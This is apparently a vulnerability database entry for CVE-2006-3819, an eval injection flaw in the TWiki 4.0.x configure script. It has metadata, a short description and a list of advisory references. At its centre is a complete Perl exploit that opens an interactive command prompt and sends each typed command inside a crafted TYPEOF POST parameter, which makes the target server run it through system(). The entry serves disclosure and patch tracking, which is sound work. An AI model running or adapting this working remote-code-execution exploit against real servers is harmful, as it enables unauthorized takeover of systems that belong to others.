TWiki Configure Script TYPEOF Parameter Eval Injection Vulnerability

Vulnerability ID 1110751 Vulnerability type Input validation
Published 2006-08-07 Updated 2006-08-08
CVE CVE-2006-3819 CNNVD ID CNNVD-200607-447
Platform PHP CVSS score 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/2143
https://www.securityfocus.com/bid/19188
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-447
|Vulnerability details
The configure script in TWiki 4.0.0 through 4.0.4 contains an eval injection vulnerability. A remote attacker can execute arbitrary Perl code via an HTTP POST request that contains a parameter whose name begins with "TYPEOF".
|Vulnerability EXP
#!/usr/bin/perl
# Tue Aug  1 13:18:12 CEST 2006 jolascoaga@514.es
use strict;
use LWP::UserAgent;
use LWP::Debug;       # provides LWP::Debug::level() used in --debug mode
use LWP::Simple;
use HTTP::Request;
use HTTP::Response;
use Getopt::Long;
$| = 1;   # couse 1 is bigger than 0
my ($proxy, $proxy_user, $proxy_pass);
my ($host, $debug, $dir, $command);
my $options = GetOptions (
    'host=s'       => \$host,
    'dir=s'        => \$dir,
    'proxy=s'      => \$proxy,
    'proxy_user=s' => \$proxy_user,
    'proxy_pass=s' => \$proxy_pass,
    'debug'        => \$debug);
&help unless ($host); # you dont need root
$dir = "/twiki/bin/configure" unless ($dir); # ... we have a template for this
print "$host - $dir\n";
while () {
    print "tinkiwinki> "; # phf haquerz style
    $command = <STDIN>;
    last unless defined $command; # stop on EOF instead of re-printing the prompt forever
    chomp($command);
    &send($command);
}

sub send {
    my ($cmd) = @_;
    LWP::Debug::level('+') if $debug; # but remember this is crap :D
    my $ua = new LWP::UserAgent();
    $ua->agent("safari/zoo");
    if ($host !~ /^http/) {
        $host = sprintf ("http://%s", $host); # CRAP CRAP CRAP
    }
    my $req = HTTP::Request->new(POST => $host.$dir);
    $req->content('action=update&TYPEOF%3A%29%3Bsystem%28%27'.$cmd.'%27%29%3Bmy+@a%3D%28=anything&submit=Submit');
    $ua->proxy(['http'] => $proxy) if $proxy;
    $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
    print $req->as_string() if $debug;
    my $res = $ua->request($req);
    my $html = $res->content();
    # extract the body text before the first <div>; fall back to the raw page if the pattern does not match
    my ($out) = $html =~ m/<body.*?>(.*?)<div/si; # <pus>
    print((defined $out ? $out : $html) . "\n");
    if ($debug) {
        open (DEBG, ">wikidebug");
        print DEBG $html;
        close (DEBG);
    }
}
sub help {
    print "Syntax: ./$0 --host=url --dir=/horde [options]\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /twiki/bin/configure\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://www.server.com/\n";
    print "\n";
    exit(1);
}
exit 0;
# <END OF EXPLOIT>

# milw0rm.com [2006-08-07]
|Affected products
TWiki: TWiki 4.0.4, TWiki 4.0.3, TWiki 4.0.2, TWiki 4.0.1, TWiki 0
|References
Source: VUPEN, Name: ADV-2006-2995, Link: http://www.frsirt.com/english/advisories/2006/2995
Source: twiki.org, Link: http://twiki.org/cgi-bin/view/Codev/SecurityAlertCmdExecWithConfigure
Source: XF, Name: twiki-configure-command-injection(28049), Link: http://xforce.iss.net/xforce/xfdb/28049
Source: BID, Name: 19188, Link: http://www.securityfocus.com/bid/19188
Source: OSVDB, Name: 27556, Link: http://www.osvdb.org/displayvuln.php?osvdb_id=27556
Source: SECTRACK, Name: 1016603, Link: http://securitytracker.com/id?1016603
Source: SECUNIA, Name: 21235, Link: http://secunia.com/advisories/21235